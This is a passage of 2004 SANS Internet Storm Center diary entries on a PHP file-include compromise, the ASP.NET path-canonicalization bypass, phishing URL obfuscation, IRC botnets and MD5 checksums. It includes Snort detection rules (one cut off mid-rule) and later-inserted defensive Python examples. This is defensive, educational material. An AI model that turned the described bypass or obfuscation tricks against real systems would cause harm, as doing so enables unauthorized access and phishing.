Patches applied to both the computer itself and the user at the console should be sufficient. If you have the facility to capture, or block, IRC traffic to unknown IRC servers (sometimes not on port 6667/tcp, either), you can potentially disrupt the botnet.


We received a report of a webserver being compromised via a long-standing problem with a PHP script package, EasyDynamicPages:

The following Snort rule should catch attempts:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP EasyDynamicPages exploit"; \
classtype:web-application-activity; sid:900018; rev:1; \
reference:url,www.securitytracker.com/alerts/2004/Jan/1008584.html; reference:cve,CAN-2004-0073; \
flow:established,to_server; uricontent:"edp_relative_path=";)

Also, be aware that EDP isn't the only vector to this vulnerability. Any PHP page that include()'s a file named by a variable that a remote attacker can fill in can be exploited in a similar way:

Perhaps a more generic method might be to search for URLs in your URIs, which shouldn't happen unless you're proxying or doing odd redirects (which happens far more often than it really should). YMMV.

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg: "handlers experimental -- URL in URI proxying with arg stacking"; \
classtype:string-detect; sid:900019; rev:1; priority:4; flow:to_server,established; tag:host,90,seconds; \

At any rate, if you're a PHP developer, you should probably triple-check your code to make sure that an attacker can't feed you a URL like this, and if you have PHP on your server, you should probably disable allow_url_fopen if you haven't


Published: 2004-10-08

Sans Top 20 - 2004 - How does it compare to 2003 Top 20; Microsoft ASP.NET ValidatePath Module; IRC Botnet Servers

For those that are interested in how the SANS 2003 Top 20 List compares to the SANS 2004 Top 20 List we are providing the links to both lists here.

SANS Top 20 for 2003

SANS Top 20 for 2004
Microsoft ASP.NET ValidatePath Module

Microsoft is currently investigating a reported vulnerability affecting ASP.NET that could allow an attacker to send a specially-formed URL request that could result in the system bypassing authentication and disclosing content.

IRC Botnet Servers
It has been a pretty quiet day on the Internet all in all. We are still receiving many reports of W32.Spybot.Worm and GAOBOT infections. We would be interested in hearing from people that are battling this worm, what are you seeing, what files have you found that are affected, what has the impact been on your organization? I will try to take the information that we receive and do an overview of the information we receive in a future Diary.
Handler On Duty
Deb Hale


Published: 2004-10-07

MS Office buffer overflow vuln, still more botnets, and don't be a baddie, be a goodie!, 2004 SANS Top 20 List

Office BOF - might be exploitable

Well, next week will bring another round of Microsoft patching goodness, a hint of which came from Secunia:


"HexView has discovered a vulnerability in Microsoft Word, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a user's system."

"The vulnerability is caused due to an input validation error within the parsing of document files and may lead to a stack-based buffer overflow."

IMHO, the best part of the advisory is the recommended solution - "Open trusted documents only." Until details are made available, here are your options - choose any two:

A - Don't open documents for which you can't establish a complete chain of custody within your trusted domain

B - Set your Internet Zone security to "High" and/or don't download files that would be rendered by MS Word

C - Don't use Word. There are alternatives (e.g. OpenOffice.org) that haven't suffered the same attention from exploit developers

D - Cross your fingers and shoot dice

Now, I have no knowledge of the existence of such an inclusion in next week's patches, nor would I be at liberty to discuss the details contained within that inclusion, if in fact, such an inclusion exists. Sir.

Botnets abound

As the ISC continues to work with network service providers to shut down large networks of compromised machines ( http://isc.sans.org/diary.php?date=2004-10-05 ) , new ones keep cropping up. Most of these "botnets" use IRC for communication, sometimes on public networks ( http://zine.dal.net/previousissues/issue22/botnet.php ), but often run on private servers installed on well-connected compromised hosts. These servers can be readily moved to another location and re-join the botnet with little effort, making it difficult to shut down the larger nets. One of the honeypots at ISTS http://www.ists.dartmouth.edu was compromised with a new SDbot variant and joined in the fray. The server it connected to reported:

There are 1 users and 10034 invisible on 17 servers

I counted over 900 unique hostnames joining one botnet channel on this network in the past 24 hours, but the only command issued was a simple scan request.

Folks, the variant of SDBot that hit the honeypot wasn't detected by 11 out of 13 antivirus programs I scanned it with. A/V alone won't defeat this rising tide. Please have a look at your perimeter sensors and keep an eye out for port 6667 traffic, especially at odd hours. If you see any that can't be attributed to deliberate user actions, capture some packets and shoot them off to us.

Vulnerable GDI dlls in unexpected places
One writer sent in:

I downloaded the GDI+ detection-tool from <http://isc.sans.org/gdiscan.php>
and it reported a vulnerable file:

Directory of C:\Program Files\Microsoft Works
06/20/2002 03:23 AM 1,708,036 gdiplus.dll

Compare to the "patched" file, in other folders:
08/04/2004 12:56 AM 1,712,128 gdiplus.dll

Microsoft Works 7, rather than Microsoft Office, is installed.

The Microsoft detection-tool did *NOT* identify that "Microsoft Works 7"
has this vulnerability. D'oh!<sic>

The Microsoft "home-page" for MS Works does not document this vulnerability.

So, it's time to check all your associates' computers,
looking to patch this vulnerability within that software,
because Microsoft is doing a sloppy job of identifying this vulnerability.

Thanks for that tasty tidbit!

Please be goodies, not baddies

We really appreciate all of the good information that the community (you!) provides the ISC. This is precisely why it works as well as it does. Please remember, however, that we, and many of you, are bound by implied and specific non-disclosure agreements (NDAs). If a vendor provides you with a limited-distribution notice, consider if it is worth your relationship with them (or your job, in some cases) to release that outside of your organization. Maintain your personal, professional and contractual trust relationships, please; we have to discuss this among ourselves at length whenever proprietary info is dropped on us.

Also on the topic of goodness, not badness - stop and think for a moment before breaking out your latest scanner-du-jour in response to an intrusion attempt. Many folks, when asking the ISC for assistance in dealing with an attacker, provide all kinds of scan output. I know it is often enlightening (and sometimes downright entertaining!) to learn about the systems that are throwing evil packets your way, but to the other side, you appear just as guilty of unauthorized activity.

Rule #1 in responding to an attack - Keep a low profile!

The 2004 SANS Top 20 List will be released on October 8th. Details at http://www.sans.org/top20/
Keep those cards and letters coming!



Published: 2004-10-06

Microsoft ASP.NET vulnerability, URL obfuscation, more MD5

Microsoft ASP.NET vulnerability (updated Oct. 7th): Microsoft announced a possible vulnerability in ASP.NET ( http://www.microsoft.com/security/incident/aspnet.mspx ). There are not many details so far, but the notice refers to the "canonicalization" functionality and suggests implementing the hardening measures outlined in KB887459 ( http://support.microsoft.com/?kbid=887459 ). It appears that a specially crafted request may confuse ASP.NET and allow access to otherwise protected directories. If a web server receives a request for a particular URL (e.g. _http://server/somedirectory/filename), the 'somedirectory/filename' part has to be mapped to a particular file located on the server. This translation has been the source of many "directory traversal" bugs; the IIS unicode exploit is probably the most famous one. After our original posting of this diary, a few users pointed to the following articles, which provide more detail than Microsoft's advisory:
(Thanks to Chaouki & Daniel)
http://www.heise.de/security/news/meldung/51730 (german)
http://blogs.devleap.com/rob/archive/2004/10/02/1803.aspx (italian)
http://www.k-otik.com/news/10052004.ASPNETFlaw.php (french)
It appears that by replacing a '/' character in the URL with '\' or '%5C', the canonicalization routine will be confused. So if the URL:
is password protected, using either of the following URLs will bypass the restriction:
In addition to the slash/back-slash confusion, one reader reports that inserting a space will bypass the URL restriction as well:
(had no chance to validate this method so far)
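The general lesson behind the slash/backslash confusion is that an authorization decision made on the request path as received is wrong whenever the file system accepts more spellings of a path than the check does. As an added example (my own Python, not the handlers' code and not the KB887459 module), here is the broken check beside a check that canonicalizes first, plus a stricter variant for a hotfix that refuses any request that is not already in canonical form. The protected directory name is an assumption; the Windows behaviours mirrored are that backslash and slash are interchangeable and that trailing spaces and dots in a path component are dropped when the file is opened.

```python
import posixpath
from urllib.parse import unquote

# Constructed: the directories an authorization rule is meant to cover.
PROTECTED_DIRS = ("/secure/",)


def naive_is_protected(request_path):
    """The broken pattern: authorize on the request path exactly as received."""
    return request_path.startswith(PROTECTED_DIRS)


def _trim(segment):
    """Win32 drops trailing spaces and dots from a path component; mirror that,
    but leave pure dot segments ('.', '..') alone so normpath can resolve them."""
    core = segment.rstrip(" .")
    return core if core else segment


def canonicalize(request_path):
    """One canonical form for every spelling of the same file.

    Percent-decoding is repeated (bounded) so double encoding such as %255C
    collapses; backslashes become forward slashes; trailing spaces/dots are
    trimmed per segment; dot segments and repeated slashes are then resolved
    relative to the web root. posixpath.normpath never climbs above "/".
    """
    p = request_path
    for _ in range(4):
        decoded = unquote(p)
        if decoded == p:
            break
        p = decoded
    p = p.replace("\\", "/")
    segments = [_trim(s) for s in p.split("/")]
    p = "/" + "/".join(s for s in segments if s)   # also removes a leading "//"
    return posixpath.normpath(p)


def is_protected(request_path):
    """Authorization after canonicalization: every bypass spelling maps back to the real path."""
    p = canonicalize(request_path)
    return any(p == d.rstrip("/") or p.startswith(d) for d in PROTECTED_DIRS)


def accept_request(request_path):
    """Strict variant for a hotfix: refuse anything that is not already canonical.

    Returns the path to serve, or None when the request should get a 400/404.
    Rejecting all percent-encoding is deliberately blunt; it is the safe side
    while the real fix is pending.
    """
    if "\\" in request_path or "%" in request_path:
        return None
    p = canonicalize(request_path)
    return p if p in (request_path, request_path.rstrip("/")) else None


if __name__ == "__main__":
    for probe in ("/secure/report.aspx", "/secure\\report.aspx", "/secure%5Creport.aspx",
                  "/secure%255Creport.aspx", "/%73ecure/report.aspx", "/secure/report.aspx "):
        print(f"{probe!r:32} naive={naive_is_protected(probe)!s:5} canonical={is_protected(probe)!s:5} "
              f"strict={accept_request(probe)}")
```

The two good functions are complementary: `is_protected` is the long-term shape (decide on the canonical path, always), `accept_request` is what you deploy in an afternoon when you cannot yet audit every place the raw path is used.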
URL Obfuscation

Handler and star SANS instructor Ed Skoudis compiled a comprehensive list of the URL obfuscation methods used in phishing schemes and spam. Some of these methods do not work with all browsers (e.g. the %01 issue in older Internet Explorer versions). In order to preserve the tricky details of some of these methods, we set up a page which includes just the URL methods without our usual header and footer: http://isc.sans.org/presentations/urlobfuscation.php (to view as source: http://isc.sans.org/presentations/urlobfuscation.txt ). Jan Reilink wrote to point us to this page with more details about URL obfuscation and decoding: http://www.pc-help.org/obscure.htm .

DDOS in progress

A reader noted that a system on his university's campus participated in a DDOS attack against
If you see any machines with excessive traffic to this IP address, please investigate further. We still need a copy of the respective malware to identify the controller.

More MD5 sum tools

Raul pointed out a nice MD5 sum tool, 'md5deep'. It will traverse directories and supports various hash formats. For details, see http://md5deep.sourceforge.net/ . Another reader suggested digestIT: http://digestit.kennethballard.com/features.html . It integrates with Microsoft Explorer, which makes it particularly easy to use.
_____________
Johannes Ullrich. jullrich |a_|sans.org
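An added example for the URL obfuscation item in the entry above (my own Python, not the handlers' code and not Ed Skoudis' list): a resolver that strips the common decoys from a phishing link and reports where it really goes. It handles the userinfo trick (everything before '@' is ignored by the browser), percent-encoded host names, and the numeric host spellings that resolve through inet_aton rules (a single dword, hex or octal octets, and short forms such as 127.1). The sample URLs are constructed; the host and path names in them are not real targets.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

_NUMERIC_PART = re.compile(r"0x[0-9a-f]*|[0-9]+")


def _component(tok):
    """One dotted component the way inet_aton reads it: 0x.. hex, leading 0 octal, else decimal."""
    if tok.startswith("0x"):
        return int(tok[2:] or "0", 16)
    if len(tok) > 1 and tok[0] == "0":
        return int(tok, 8)            # raises ValueError for "08", "09"
    return int(tok, 10)


def numeric_host_to_ip(host):
    """Dotted-quad string for numeric host spellings browsers accept
    (dword 3522198813, hex 0xd1.0xf0.0x7d.0x1d, octal 0321.0360.0175.035,
    short forms such as 127.1), or None if the host is not numeric."""
    parts = host.lower().split(".")
    if not 1 <= len(parts) <= 4 or not all(_NUMERIC_PART.fullmatch(p) for p in parts):
        return None
    try:
        values = [_component(p) for p in parts]
    except ValueError:
        return None
    # inet_aton: every component but the last is one byte; the last fills the remaining bytes
    last_bytes = 5 - len(values)
    if any(v > 255 for v in values[:-1]) or values[-1] >= 1 << (8 * last_bytes):
        return None
    packed = 0
    for v in values[:-1]:
        packed = (packed << 8) | v
    packed = (packed << (8 * last_bytes)) | values[-1]
    return str(ipaddress.IPv4Address(packed))


def real_destination(url):
    """Strip the decoys and report where the link actually goes.

    urlsplit() already discards the userinfo before '@', which is the part a
    phisher fills with the trusted-looking name; we keep it as "decoy".
    """
    parts = urlsplit(url.strip())
    host = unquote(parts.hostname or "")        # undo %77%77%77 style encoding of the host
    ip = numeric_host_to_ip(host)
    return {
        "scheme": parts.scheme,
        "decoy": parts.username,                # what the victim was meant to read
        "host": ip or host,
        "numeric_host": ip is not None,
        "path": parts.path or "/",
    }


if __name__ == "__main__":
    # Constructed samples; 209.240.125.29 is just the decoded value of the examples below.
    for u in ("http://www.paypal.com@3522198813/cgi-bin/webscr",
              "http://0xd1.0xf0.0x7d.0x1d/",
              "http://0321.0360.0175.035/login",
              "http://%77%77%77.example.com/",
              "http://www.example.com/"):
        print(u, "->", real_destination(u))
```

Run it over the links in a suspect mail before anyone clicks; the "decoy" field is the bank name the victim saw, the "host" field is the box that will receive the credentials.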


Published: 2004-10-05

A trojan that deletes spyware? - More botnet fun - World record attempt

Anti Spyware Trojan?

As reported by ISC Handler Pat Nolan, a new trojan has been released into the wild that seems to terminate processes and delete files and registry keys known to be associated with adware products. More details are available at http://securityresponse.symantec.com/avcenter/venc/data/downloader.lunii.html


We've received reports of a few new botnet infestations of the same critter Deb Hale reported in http://isc.sans.org/diary.php?date=2004-09-25 . Botnets are a perfect example of why you need to know what's normal on your network and what's not. Great job Dan and Mr. Anonymous Senior Analyst. ;)

Speaking of botnets ...

The ISC was alerted to a .jpg image file (thanks Mark!) that carried an MS04-028 (GDI+ JPEG) overflow, which caused the machine to download and run an executable, jpeg.exe.

jpeg.exe silently installs itself as a service on the PC, adds a registry key to autorun at reboot, then connects to an IRC server, announces the compromise and waits for commands.

Actions have been taken to have the offending site blocked.

AV scan results of jpeg.exe are as follows (from http://www.virustotal.com ; a "-" in the Result column means no detection):

Antivirus     Version          Update       Result
BitDefender   7.0              10.05.2004   Backdoor.Hackarmy.1.Gen
ClamWin       devel-20040922   10.05.2004   -
eTrust-Iris                    10.04.2004   Backdoor/AZV.Variant
F-Prot        3.15a            10.05.2004   W32/Hackarmy.AJ@bd
Kaspersky                      10.05.2004   Backdoor.Hackarmy.gen
McAfee        4396             09.29.2004   BackDoor-AZV.gen
NOD32v2       1.884            10.04.2004   probably unknown NewHeur_PE
Norman        5.70.10          09.30.2004   W32/Backdoor
Panda         7.02.00          10.04.2004   Bck/HackArmy.T
Sybari        7.5.1314         10.05.2004   Backdoor.Hackarmy.gen
Symantec      8.0              10.04.2004   -
TrendMicro    7.000            10.04.2004   -

Bellhops and luggage carts and sheets, oh my!

While SANS NS Las Vegas 2004 will remain firmly engraved in many people's memory, it hopefully won't be remembered for the record attempt mentioned previously, that eventually failed. We're happy to report that there were no serious injuries and that all handlers have (apparently) survived unharmed. It should be noted however that the handler attempting the record has not been heard from since just after the attempt when he was seen with several statuesque showgirls. Good luck Tom, wherever you are. ;)

Chris Carboni

Handler on Duty


Published: 2004-10-04

MD5 Checksum Updated / MD5 Tools for Win32 / Botnets reports

MD5 Checksum, Updated

The following is Lorna's update from her diary yesterday:

This update is in response to many emails from the user community about the entry regarding using MD5 checksums. Thanks for writing in and sharing your thoughts!! Many people question the need for using MD5 checksums since a hacker can modify the checksum as well. I don't disagree at all; however, measures can and should be taken to protect the location where the MD5 checksum is stored so they at least have to work for it. However, the responses that we received reinforced the point I was trying to make. Most folks aren't checking them, so why should a hacker go through the trouble of modifying them? We only got one response telling us the hash was wrong for the latest update; maybe only one person downloaded it since we updated it, and maybe others simply did not respond about it. However, if a hacker has modified the file but did not modify the checksum, it may save you much pain and confusion if you spot this early. One step farther: if YOU don't know what the checksum is for the file you're providing, how do you know it's not been modified? It wouldn't take much to write a script that checks the values of the MD5 checksums against known good values and ensures they have not been changed, or better yet, store them on another server. Keep a copy of the valid checksums on separate media or burn them onto a CD so you know what the valid hash should be. The MD5 checksum is NOT meant to be a single solution to the problem, but it is a tool that should be part of your security regime.

As a secondary note, we have had questions about what to use to compute an MD5 checksum on Windows. I personally use MD5sum.exe on my Windows systems. A quick search on Google will also point at others that are available. Once again, thanks for all the emails.

MD5 Checksum Tools

For those asking us about tools to check the md5 Checksum in Windows OS, here is a small list of such applications:

- md5sum.exe - from http://www.etree.org/md5com.html
- Unixtools - http://unxutils.sourceforge.net
- md5summer - http://www.md5summer.org

Botnets reports

We received some questions from users about the authorities referenced by Lorna in yesterday's diary.

When we receive such reports, we notify a security contact at the ISP that was providing network access and at their upstream ISP.

We provide portions of the information we receive as evidence of AUP violations, while always preserving the privacy of the user who reported it.

Once again, thanks for all reports!


handler on Duty: Pedro Bueno (pbueno /AT/ isc.sans.org )


Published: 2004-10-03

Botnet Report; MD5 Checksum; Handlers Update, Live from Las Vegas

Botnet Report

A large botnet that was actively exploiting IP addresses was reported to the handlers by Vidar Wilkens from Telenor.com. The information was passed on to the proper authorities for investigation. More information will be made available when we are able to do so.

MD5 Checksum

Since the development of the GDIscan tool by our very own Tom Liston, it has gone through many iterations and changes, which have required the MD5 checksums to be updated as well. Surprisingly, very few have questioned the hashes when they haven't matched after an update. If you aren't in the habit of checking the MD5 hashes of files, it's important that you start. While not foolproof, the hash tells you whether the file you have is the file the publisher hashed; that only holds if you got the published hash from somewhere the attacker couldn't also edit, which is why a hash you wrote down earlier, or one obtained through a separate channel, beats the one sitting next to the download. Everyone should remember a couple of years back when the Sendmail distribution was compromised with a Trojan: if you didn't have PGP, the only way to verify the file you had downloaded was to check its MD5 checksum. If you don't do it now, start making it a habit to verify what you are downloading. For more information on the Sendmail compromise see
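The script suggested in the Oct. 4 update (checking a tree of files against known good values, the way md5deep -r walks a directory) and the single-download check above are both small enough to show in one place. What follows is an added example, my own Python rather than md5deep or any ISC tool, that builds a manifest for a directory, verifies the directory against a manifest kept elsewhere, and checks one download against a published sum with a constant-time comparison. The file names and contents in `demo()` are constructed. Two caveats a practitioner should carry along: the comparison is only as trustworthy as the channel the reference value came from, and MD5 collisions were demonstrated publicly in August 2004, so the manifest records SHA-256 alongside MD5 and verifies on SHA-256 by default.

```python
import hashlib
import hmac
import os
import shutil
import tempfile

ALGORITHMS = ("md5", "sha256")   # md5 to match published sums, sha256 because md5 collisions are known


def file_digests(path, chunk_size=1 << 16):
    """Hash one file in chunks; large files must not be read into memory whole."""
    hashers = {a: hashlib.new(a) for a in ALGORITHMS}
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(block)
    return {a: h.hexdigest() for a, h in hashers.items()}


def hash_tree(root):
    """Recursive manifest of a directory: {relative posix path: digests}."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()                       # deterministic order
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full):          # hash what is on disk, not what a link points at
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = file_digests(full)
    return manifest


def verify_tree(root, known_good, algorithm="sha256"):
    """Compare the tree on disk against a manifest kept somewhere else (another server, a CD)."""
    current = hash_tree(root)
    return {
        "modified": sorted(p for p in known_good
                           if p in current and current[p][algorithm] != known_good[p][algorithm]),
        "missing": sorted(p for p in known_good if p not in current),
        "added": sorted(p for p in current if p not in known_good),
    }


def verify_download(path, published_hex, algorithm="md5"):
    """Single-file check: our digest against the one the publisher posted.

    Constant-time compare; case and surrounding whitespace in the published
    value are normalized. Meaningful only if published_hex came from a channel
    the attacker could not also edit.
    """
    actual = file_digests(path)[algorithm]
    return hmac.compare_digest(actual.lower(), published_hex.strip().lower())


def demo():
    """Build a small tree, snapshot it, tamper with it, and report. All data constructed."""
    root = tempfile.mkdtemp(prefix="hashdemo-")
    try:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "gdiscan.exe"), "wb") as fh:
            fh.write(b"MZ original tool bytes")
        with open(os.path.join(root, "README.txt"), "wb") as fh:
            fh.write(b"hello")
        with open(os.path.join(root, "empty.bin"), "wb"):
            pass
        snapshot = hash_tree(root)            # store this copy where the attacker cannot reach it
        report = {
            "readme_sha256": snapshot["README.txt"]["sha256"],
            # md5 of the empty file, published in upper case to show normalization
            "empty_md5_ok": verify_download(os.path.join(root, "empty.bin"),
                                            "D41D8CD98F00B204E9800998ECF8427E"),
            "readme_bad_md5_ok": verify_download(os.path.join(root, "README.txt"), "00" * 16),
        }
        with open(os.path.join(root, "bin", "gdiscan.exe"), "ab") as fh:
            fh.write(b"\x90 injected")          # the tamper
        os.remove(os.path.join(root, "empty.bin"))
        with open(os.path.join(root, "bin", "extra.dll"), "wb") as fh:
            fh.write(b"new file")
        report.update(verify_tree(root, snapshot))
        return report
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In practice the manifest from `hash_tree` is what you burn to the CD; `verify_tree` runs from the CD against the live directory, never the other way round.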

SANS Handlers Make Land Sailing Record Attempt

Dateline- Las Vegas

Written by: An anonymous handler (however, initials are TL)
In the windy hallways of the Riviera Hotel in Las Vegas, Nevada, the SANS Internet Storm Center Handlers are planning to make an attempt to set the World's Speed Record for sailing a bellhop luggage cart using a hotel bedsheet as a sail. Unbelievably, it is claimed that the consumption of alcohol is not involved in the attempt, but rather simply some strange combination of geek curiosity and testosterone. We will update the diary with the results of this grand experiment and tell you to which hospital cards and flowers are to be sent.

Lorna Hutcheson


Handler on Duty


Published: 2004-10-02

Vendors Take Note, Mark II, DHS Cyber Chief Departure


In September 27th's diary entry, Joshua Wright included a stanza asking software vendors to determine whether or not their software has distributed vulnerable gdiplus.dll libraries, and to provide appropriate replacements as soon as possible. Reports from users of Tom Liston's GDIscan ( http://isc.sans.org/gdiscan.php ) finding vulnerable versions in a variety of software applications have continued. This morning, Will Harper wrote in requesting that the Handlers expand our notice to these vendors.

If your software package utilizes the gdiplus.dll library, please notify your users by e-mail or a posting to your website with the application-specific fix necessary to close this vulnerability as soon as possible. Suggestions are to instruct the users how to copy a non-broken version over the vulnerable one, or provide a properly fixed version themselves.

Editorial: DHS Cyber Chief Departure.

Many in the cyber security community were shocked to learn of Amit Yoran's departure from the Department of Homeland Security's National Cyber Security Division on Friday. Amit was appointed in September 2003 to head the NCSD, which was formed in June of that year. The NCSD was not part of the original design of DHS, but was added to the Department's structure after intense lobbying from both industry and government officials. It is unfortunate that Amit chose to leave after only a year at the helm of the NCSD, but we applaud the work he did over the past year and extend our appreciation to him for his service.

It is important that DHS move quickly to find a new cyber chief who can continue the work started by Amit. This person needs to be able to work directly with cyber security policy officials in the Office of Management and Budget and the Homeland Security Council in the White House, as well as with CIOs and CISOs of the other federal departments and agencies. Additionally, the next chief needs to have close ties with cyber security leaders in industry, academia, and especially the international community. Cyber security is too important to bury under layers of bureaucracy. A strong partnership between the public and private sectors, both domestically and internationally, is needed to ensure the security and reliability of the global Internet. (Written by Marcus Sachs, ISC Director)

Dave Brookshire, dsb AT parapet DOT net



Published: 2004-10-01

GDI Attacks via Email; Natural Disasters and Data Recovery / Data Security

GDI Attacks via Email

We have received a few reports of email messages containing JPEG images which appear to be intended to attack the GDI vulnerability.

Natural Disasters and Data Recovery / Data Security

This story was relayed by Scott Fendley, another ISC Handler:

A co-worker's son and his family live in the area of Florida being devastated by all the recent hurricanes. Prior to one of the latest hurricanes, they decided to leave the area to go stay with relatives somewhere safer. They took some things with them (perhaps some important documents as well) but left their computer at home -- the computer with all their digital pictures and online banking and other financial information. Upon their return, they discovered the house had been flooded with up to four feet of water.

Their insurance company said to place all of the damaged property outside in front of the house to make it more convenient for when the claims adjuster came by. They put out all of their damaged furniture as well as their computer. That night, someone came by and stole the computer.

Well, the computer may have been destroyed, but the hard drive was probably still functional if removed and installed into another computer, so someone could have just gotten lots of personal and financial information about these folks such as bank accounts, credit cards, etc.

What about paper records (such as monthly banking and credit card statements) that may have been turned into a soggy mess as well? Was this all just thrown out where it could be scavenged as well?

Data Recovery: When making backups of your data, you need to take into account what you need to backup, how to back it up and where to store the backups. In this case, if they made backups of their online financial data onto Zip disks and stored the disks at home, those backups may not be available or in usable condition. Periodically backing up your data to a removable USB/Firewire hard drive and storing the drive at another physical location would greatly increase the likelihood of having a usable backup afterwards in such a disaster.

Data Security: How do you dispose of such data? If you have a bad hard drive, do you just throw it out, or do you physically destroy it with a hammer? Do you just throw out records with personal information such as account numbers, or do you shred such paper? If you shred it, do you use a strip shredder or a cross-cut shredder, which leaves many more, much smaller remnants? A drive that still spins, or a statement that is merely wet, is still readable by whoever picks it up off the curb.

Scott's acquaintance's relatives are now having to contact all of their financial organizations to get new account numbers, new PINs, place a notice on the credit reports -- all to hopefully minimize, if not eliminate, the risk of them becoming the victims of identity theft due to the potential loss of sensitive data.


David Goldsmith

dgoldsmith at isc.sans.org